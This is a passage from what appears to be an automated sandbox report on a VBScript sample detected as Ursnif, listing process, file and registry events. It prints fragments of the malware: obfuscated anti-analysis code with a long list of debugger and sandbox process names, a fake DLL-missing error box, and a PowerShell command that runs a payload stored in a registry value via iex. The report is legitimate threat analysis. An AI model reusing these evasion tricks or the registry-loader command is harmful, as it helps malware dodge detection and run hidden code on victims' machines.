                    Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: sample.vbs | Static file information: File size 1397160 > 1048576
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdbXP=a source: powershell.exe, 00000016.00000002.885459267.00000200B1696000.00000004.00000001.sdmp
                    Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.540443568.000001C497429000.00000004.00000001.sdmp, fum.cpp.0.dr
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdbXP=a source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp

                    Data Obfuscation:

                    VBScript performs obfuscated calls to suspicious functions
                    Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F27AB0 push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_00F27E1F push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_0575528F push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 18_2_05745529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'

                    Persistence and Installation Behavior:

                    Creates processes via WMI
                    Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                    Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\fum.cpp
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dll
                    Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\fum.cpp
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dll

                    Hooking and other Techniques for Hiding and Protection:

                    Yara detected Ursnif